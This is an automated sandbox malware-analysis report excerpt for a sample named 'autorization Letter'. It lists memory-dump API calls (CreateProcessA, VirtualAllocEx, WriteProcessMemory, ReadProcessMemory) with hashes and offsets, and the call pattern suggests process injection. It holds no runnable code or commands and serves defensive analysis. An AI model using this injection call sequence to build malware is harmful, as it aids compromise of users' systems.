                                                                  • Opcode Fuzzy Hash: 15f7caaf1d2460b723114380d5b25f56ae2baa9fa5af1bf173c6a1f2ffdc33cc
                                                                  • Instruction Fuzzy Hash: 90A16BB1D0021ADFDB24DF68C841BEEBBB6FF48314F148169D818A7290DB759985CF92

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079309F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: CreateProcess
                                                                  • String ID:
                                                                  • API String ID: 963392458-0
                                                                  • Opcode ID: fc44bb6b439ddd38b1bd2f85fbdd3c6f34022835e24e4441fafa16971bf30668
                                                                  • Instruction ID: 15527f38b45139e167bb5517c5fc318cd7c1b22202fd5d2f15813026a2720d34
                                                                  • Opcode Fuzzy Hash: fc44bb6b439ddd38b1bd2f85fbdd3c6f34022835e24e4441fafa16971bf30668
                                                                  • Instruction Fuzzy Hash: AD916BB1D0021ACFDB24DF68C841BEEBBB6FF44314F148169D818A7280DB759985CF92

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 016BB03E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: 4df3fff8347a19d9a010a5fc8210c336643a4efcb1edb0213705fffb62e3ab9f
                                                                  • Instruction ID: b526738f3985c7b4344f3e7ca459b31f8525d9a132aae09ba2f696649ff9f895
                                                                  • Opcode Fuzzy Hash: 4df3fff8347a19d9a010a5fc8210c336643a4efcb1edb0213705fffb62e3ab9f
                                                                  • Instruction Fuzzy Hash: FD813470A00B059FD764DF69D88079ABBF6FF88200F008A2DD54AD7B50DB75E886CB95

Control-flow Graph
APIs
• CreateActCtxA.KERNEL32(?), ref: 016B59C9
Memory Dump Source
• Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 2b6fe5dea264587ccb3ef29cacf1acbd83134eb3be0a467100202664899e7e3d
• Instruction ID: 594128fe8c0f5e21a5042e8d42fff0ce63391ba52664528e2dafb263a85fd914
• Instruction Fuzzy Hash: AD41D1B1C00719CFDB24DFA9C884BDEBBB2BF49304F20816AD509AB255DB755986CF90

Control-flow Graph
APIs
• CreateActCtxA.KERNEL32(?), ref: 016B59C9
Memory Dump Source
• Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: bacb30e7428e0e82b2d6288364109ecd1f5ee2f3aee76e3b50e35d74650d58e2
• Instruction ID: 3c95bdfdf85e3d56b8c3124a536af1ad719bf0f77793300726684ada23bef2e0
• Instruction Fuzzy Hash: 8F41DFB1C0071DCFDB24DFA9C884ADEBBB5BF49304F20806AD509AB255DB756986CF90

Control-flow Graph
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079305C8
Memory Dump Source
• Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 87996d6218511ec3af11673489660986553daf99ad797cf9681b33d9747b4ca3
• Instruction ID: 00276217f291373fcb81027de8d990f2ac2bfb74b4520edbc2ae34a3c8c1a0b1
• Instruction Fuzzy Hash: D8212CB5D003199FCB10DFAAC8847EEBBF5FF48314F10852AE919A7240C7789544CBA0

Control-flow Graph
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079305C8
Memory Dump Source
• Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 3c778f315b6c5ea225913a2a0e1a72af9d807787d377be647f03b8edb4562a99
• Instruction ID: 558ef7c740ae35832161398affb904984290194ad2bc40c30722dda3f767d448
• Instruction Fuzzy Hash: 132119B5D003599FCB10DFAAC985BEEBBF5FF48314F10842AE919A7240D7789944CBA1
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016BD747
Memory Dump Source
• Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: ba7a5f664a3bedd4e5bddc47deb05bbba47f7642f7f77642e2ffd1cd7f8e88c8
• Instruction ID: 6a0ba1fd719c9b2f7f92fb1f3ad5fd1cd42091d47d41b70273a726d3f867bd0b
• Instruction Fuzzy Hash: 7A21E5B5900248EFDB10CF9AD984AEEBFF4FB48314F14801AE918A7350D379A954CFA5
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079306A8
Memory Dump Source
• Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: bdc908378bf7a306f9929e23feb8e26f06d190039f18b43454c831a56e607851
• Instruction ID: 18ff47360f5c7cfbe2400143e7e6d60b4bd7fae045bbc3f0ce04f5faeb1a357c
• Instruction Fuzzy Hash: 3C214AB1D003099FCB10DFA9C9846EEBBF5FF48324F10852AD918A7240D7789541CBA0
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079306A8
Memory Dump Source
• Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 750bfb37f61fc22015913280cda0490d32af5c7fb61ae493c6fda6380781add2
• Instruction ID: 003cc7102d9f8aebaf2d23ad3428f2c96b538a427b72c39189b00db4957129bd
• Instruction Fuzzy Hash: C5213AB1D003499FCB10DFAAC884AEEFBF5FF48314F50842AE919A7240CB799540CBA1
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016BD747
Memory Dump Source
• Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
Similarity
• API ID: DuplicateHandle
• String ID:
• API String ID: 3793708945-0
• Opcode ID: 68e302e7e0df7b7c75e9d5723c37adbb8dbc1af51f25b051a7e309e24e3ec4dd
• Instruction ID: ba4aa16a661d6f787cefb9fb374bac698df8b29da3ba322ce6975a2214db9f04
• Instruction Fuzzy Hash: 2521C4B5D002489FDB10CF9AD984AEEBFF9FB48314F14841AE918A7350D379A944CFA5
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079304E6
Memory Dump Source
• Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 797c8dd9cc0cd46b60a9c03ee58961d4f8d3e583ddbe38a23d776639efcb4702
• Instruction ID: f8601bda4dc3e2270f9a9a0add79d7f682eabbdcc54b5d8d62c452431c0f5492
• Instruction Fuzzy Hash: C5114AB59002099FDB10DFA9C844BEEBBF5EF89320F108419D519A7290CB359544CBA0
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079304E6
Memory Dump Source
• Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: aef1cb37067b7210fcabe08c28f9c9e82db85ae7654f8efe75c8fa3d2dd3c248
• Instruction ID: 9fc002c072f384618e55105656feb837ce9207bbab32518bbe1d62d52804a5c1
• Instruction Fuzzy Hash: F11137B19002499FDB10DFAAC844AEFBFF5EF48314F108419E919A7250CB79A540CFA1
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 016BB03E
Memory Dump Source
• Source File: 00000001.00000002.2157051692.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_16b0000_autorization Letter.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 830744e7d13a67582298b6f1748d9d479d1e67294e7aa9f0301bf566710be91f
• Instruction ID: 0f3c7439dc9add5e16632bc741ce516db74ea1ce118d8faa044e9f89e9a21053
• Instruction Fuzzy Hash: 3B110FB5C002498FDB10CF9AC884AEEFBF4AB88210F10841AD928A7200D379A585CFA1
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 07935185
Memory Dump Source
• Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: b4c920d48b7e093c1abed2b70727fc925a3e7d20ee412454b45e5c083538362a
• Instruction ID: a367fefce699a1b8511550ae173abe33fc4e1cd15d9b6123620aa136a0faba32
• Instruction Fuzzy Hash: 851106B58003499FCB10DF99C884BEEBBF8EB48314F108419E918B7200C379A954CFE1
APIs
• PostMessageW.USER32(?,00000010,00000000,?), ref: 07935185
Memory Dump Source
• Source File: 00000001.00000002.2163554683.0000000007930000.00000040.00000800.00020000.00000000.sdmp, Offset: 07930000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7930000_autorization Letter.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: f665480bcdac1c07064f3e500aee68d3a14d02d660392a9a2513276c3dfed223
• Instruction ID: aad19419a5750284cd75eed82ed8385e1997e9f75826f1ba1720ec0a6c49ea73
• Instruction Fuzzy Hash: F41106B58003499FCB10CF99C985BDEBBF8EB48314F10885AD558B7240C379A544CFE1
Strings
Memory Dump Source
• Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
Similarity
• API ID:
• String ID: @
• API String ID: 0-2766056989
• Opcode ID: 9ea5a4c81cec4ac97f45057d83acd8e5ca97275f4d6c5d5535277ef29c8f08b5
• Instruction ID: 769bf5b2ba350e8b05c2e13d6ceaad0acd102b340bad2cb356472781d54a8a9c
• Instruction Fuzzy Hash: 50D11C3591120ACFDF04DFA8C4949EDBBB1FF48315B258655D806AB259EB30BE86CF90
Strings
Memory Dump Source
• Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
• Opcode ID: c59cc2808fb8aa74b98cb8a28c09453b0bb3efbd1a0c58b0dfa865a8f38b61fb
• Instruction ID: 5d0bee27e05525aafb04db7859704fc496922fec6dab2b93375778a2b7c08297
• Instruction Fuzzy Hash: A4A1DB3591064ACFCF05DFA4C4848DDBBB1FF58315B218655D816AB259EB30AE8ACF90
Strings
Memory Dump Source
• Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
Similarity
• API ID:
• String ID: (aq
• API String ID: 0-600464949
• Opcode ID: 4fc5fecd636103b9a3306f95188ffde8d42ee8e9cd23ebd756abd196ca4be688
• Instruction ID: 6bfea8b6a394bd2c7ffea1e1841d032791dc4e4fd2d3a18fb766cf173fe40e88
• Instruction Fuzzy Hash: FA313862B083459FDB19DFB9981857F7FA6AFD5200F1484BAD805C7682EE309C02C7A2
Memory Dump Source
• Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 64dedf7dab02c9a2d511607b6e248d50296fe5edba126cec2ec5aa5e17596af8
• Instruction ID: 4d9b89124cdf428658454366dc6e7c029ea1685ffad282a959febaa9c2db3ba3
• Instruction Fuzzy Hash: 63725031910609CFDB15EF68C858AADBBB1FF45305F008299D94AA7265EF30AEC5CF91
Memory Dump Source
• Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5abdaef831b17e4989ad77ea93fee1b19d209e1d673e721730d91938674b89fb
• Instruction ID: 98f7cae24b8d922aa452fa464713eb346f5aa603f9d5bac69b3fb2ca096c9568
• Instruction Fuzzy Hash: 2742D731E107198BDB25DF68C8846EDB7B2BF89304F158699D859BB211EB30AE85CF50
Memory Dump Source
• Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 94e7bea59ff36a7320edea0ca113a9f0223f40d14e589a8492b0a522fed189ca
• Instruction ID: 056f05255379d554ad20889157d1ce05cb6d5f20f79bae653309388a83b24a83
• Instruction Fuzzy Hash: 06222B35A00205CFDB14EF69C898A9DB7B2FF88304F1485A8E94AEB365DB71AD45CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6ae01d220c212f040cfb10bbcc823ef441707ac04607df5801a21ed9acc0d309
                                                                  • Instruction ID: 37523f6ccb893d2b30d3637e09360d5e2710bacd6e0f303c597659cebaf3d341
                                                                  • Opcode Fuzzy Hash: 6ae01d220c212f040cfb10bbcc823ef441707ac04607df5801a21ed9acc0d309
                                                                  • Instruction Fuzzy Hash: C8C16F35B006018FDB08EF79C89869977A2FF88300F15857DD80AAB369EF75AC85CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8e9695cd0c592920e413825c0bdf7a9dc1ce9402469c1ffd35d41e8495d38955
                                                                  • Instruction ID: 279a3d289025f121607c759bdf6adfb99d8347d012b5fa9f75ec94d99becc210
                                                                  • Opcode Fuzzy Hash: 8e9695cd0c592920e413825c0bdf7a9dc1ce9402469c1ffd35d41e8495d38955
                                                                  • Instruction Fuzzy Hash: EEB17335B006018FDB48EF68D89469977A2FF88300F15857DDC0AAB369DF75AC85CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 40a7aaa84fddafb33a53f4b0e52dec7c38c94dc0278dbac984ec8fb4c86d8967
                                                                  • Instruction ID: 9493694531d0367761544e70260b37637058e8342245483fea9c830bdadf475f
                                                                  • Opcode Fuzzy Hash: 40a7aaa84fddafb33a53f4b0e52dec7c38c94dc0278dbac984ec8fb4c86d8967
                                                                  • Instruction Fuzzy Hash: 35B16F35B006018FDB58EF68C89869977A2FF88300F15857DDC0AAB366DF75AC85CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3391d83a0915eb75661cc66191f189b73f7be671a5bd645aca90eec866dbe36b
                                                                  • Instruction ID: 16186f13783654600cf2d5e7f99f7ff9364b089b43985f422343a7298302ced8
                                                                  • Opcode Fuzzy Hash: 3391d83a0915eb75661cc66191f189b73f7be671a5bd645aca90eec866dbe36b
                                                                  • Instruction Fuzzy Hash: 28710332A04245CFEF15DBA8C8946ADBBB2FF85300F14446ED406DB3A2DB789D4ACB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9b95c7426acbf4153e34b9b994defdae320da4d1ccc916ed84a2b0d4fa98757d
                                                                  • Instruction ID: 5c5d56bc65686792ee8025bba60f161500707a9c7f6a8fc046e1bf784af26655
                                                                  • Opcode Fuzzy Hash: 9b95c7426acbf4153e34b9b994defdae320da4d1ccc916ed84a2b0d4fa98757d
                                                                  • Instruction Fuzzy Hash: 7291077190060ACFDB41DF68C880999FBF5FF89310B14C79AE819EB255EB30E985CB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 52cd19654d472a1bf88c7a83e72bfe70004bba20701ff58fc954b4e4e66e2ad0
                                                                  • Instruction ID: 9f9c3dd6d19a35a235844c4bf0b99755ebe864db99e1a88d5afa25de15cf2729
                                                                  • Opcode Fuzzy Hash: 52cd19654d472a1bf88c7a83e72bfe70004bba20701ff58fc954b4e4e66e2ad0
                                                                  • Instruction Fuzzy Hash: 8881CE75A11208AFDB15DFA8D884DAEBBB2FF49324B154099F906AB361D731EC81CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 467fbb151cefa2463569fe4eea2ea6ac3b7211aab7f18c1054a684dcbf1ef2f9
                                                                  • Instruction ID: 0427c0f10dd7f06929103d8b4aa3866102374782054d61e305795be49c24359d
                                                                  • Opcode Fuzzy Hash: 467fbb151cefa2463569fe4eea2ea6ac3b7211aab7f18c1054a684dcbf1ef2f9
                                                                  • Instruction Fuzzy Hash: 2A518A316106008FDB14EF29C898B9977F6FF89310F1486B8D946DB3A5DB70AC05CB61
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9bace29385e12524434dba85e34aede08179105121f05f9de8141b3a14bbf9c3
                                                                  • Instruction ID: 53077b79a39a4ac2db635e37ca00da5f58e0887027b1fd8fd75ba9a7e11ad829
                                                                  • Opcode Fuzzy Hash: 9bace29385e12524434dba85e34aede08179105121f05f9de8141b3a14bbf9c3
                                                                  • Instruction Fuzzy Hash: 1E510634A10605CFCB04EF68C8989ADBBB6FF89704F1585A9E506DB375EB70AC45CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: da37adf61e124acead21bd560cd5cd9d1876c9fa3a5ee95baacec6fd956280eb
                                                                  • Instruction ID: 5cd2e5b2d0f077fdb2923ff16faf286185942ac0e7c7f4e04f6dbe0c5977f740
                                                                  • Opcode Fuzzy Hash: da37adf61e124acead21bd560cd5cd9d1876c9fa3a5ee95baacec6fd956280eb
                                                                  • Instruction Fuzzy Hash: E4512A7191070ACFDB41EF68C880999FBB5FF89310B14C75AE859EB255EB70E985CB80
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 38e36412e389c5695b3b78b5e7e57388ff961b7587fa4f64e903b906f70cad7b
                                                                  • Instruction ID: 1f57911fa8a1517f82c34a66631e0e371afe277cc3306718393765adab5441cb
                                                                  • Opcode Fuzzy Hash: 38e36412e389c5695b3b78b5e7e57388ff961b7587fa4f64e903b906f70cad7b
                                                                  • Instruction Fuzzy Hash: E451F534A10605CFCB04EF68C8989ADBBB6FF89704B1585A9E506DB375EB71EC45CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3912ae0517c841c2b501031437fce156dcee27095036684e6d16a5a742f05330
                                                                  • Instruction ID: 3e780a84a531fc97b60eab97f735ffd20840bee1af94f1ba3d3089a3821d79ce
                                                                  • Opcode Fuzzy Hash: 3912ae0517c841c2b501031437fce156dcee27095036684e6d16a5a742f05330
                                                                  • Instruction Fuzzy Hash: CF5158357006048FEB18DB68D488AAEBBF6FF88614F048569E846DB761EB74EC41CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a677901e39eae1d1425ac7b6b52d7bb7ce4c3cdb3b8159f86ba15f9575c39a50
                                                                  • Instruction ID: cc04dfa04fa1724cf62d8999a62770a05cd3aa0be831ab9b79277fc0e64d7e5e
                                                                  • Opcode Fuzzy Hash: a677901e39eae1d1425ac7b6b52d7bb7ce4c3cdb3b8159f86ba15f9575c39a50
                                                                  • Instruction Fuzzy Hash: B731BE31E12218DFDB18DFA4E5589AEBBB2FF89301F118469E842B7291DB31AC55CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 68145dd964c76bd77eb4cad1d95c9db79054e5e2abf360b05b2495d5fa2e9192
                                                                  • Instruction ID: 87933ade1bca2b8fcdc2e858ae231d7d9db5f1e3ea2aaba00d9c0034b51015b3
                                                                  • Opcode Fuzzy Hash: 68145dd964c76bd77eb4cad1d95c9db79054e5e2abf360b05b2495d5fa2e9192
                                                                  • Instruction Fuzzy Hash: B0413B31B142989FEB14DB69C898EADBBF6FF49604F1440A9E901EB361DB75DC80CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8fefafc872fbc84433b17a788a8d1dbecea74a60a647b756bf75ecc76fe63072
                                                                  • Instruction ID: 80b300089dc806a78f3a0a126c393e89ce45eeb8f7f3cbeacadf51aa1e984963
                                                                  • Opcode Fuzzy Hash: 8fefafc872fbc84433b17a788a8d1dbecea74a60a647b756bf75ecc76fe63072
                                                                  • Instruction Fuzzy Hash: E0414B36A006198FEF26DB68E948AADBBB6FF88314F144165D801F7350DB35AD41CFA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 37b37b32f9ec4db45b50939578be63eedbc827c1026d21539087ae81709c17fa
                                                                  • Instruction ID: 1706d4f5e1cddd3975cdc4bed1ccbb15bb6bc238dd3779cdec786e8d24bc2c77
                                                                  • Opcode Fuzzy Hash: 37b37b32f9ec4db45b50939578be63eedbc827c1026d21539087ae81709c17fa
                                                                  • Instruction Fuzzy Hash: F7512876A01209AFEF14DF94D594BAEBBB2FF88310F118069E905A7361CBB1AD41CB51
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b8c1a2e8bf410c98b8c05fab865a89d7629a8c16ea7c40cb6297bba21a07a97f
                                                                  • Instruction ID: e6e76546c565f3a3d6f02198cd061121dd1c7bea73260f641a7265164ee8b53a
                                                                  • Opcode Fuzzy Hash: b8c1a2e8bf410c98b8c05fab865a89d7629a8c16ea7c40cb6297bba21a07a97f
                                                                  • Instruction Fuzzy Hash: EF51A239A11204AFDB54DF68D894DAEBBB2FF89320B154498F9069B361DB31EC81CF50
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.2162504131.00000000058A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_58a0000_autorization Letter.jbxd
                                                                  Similarity
                                                                  • API ID:
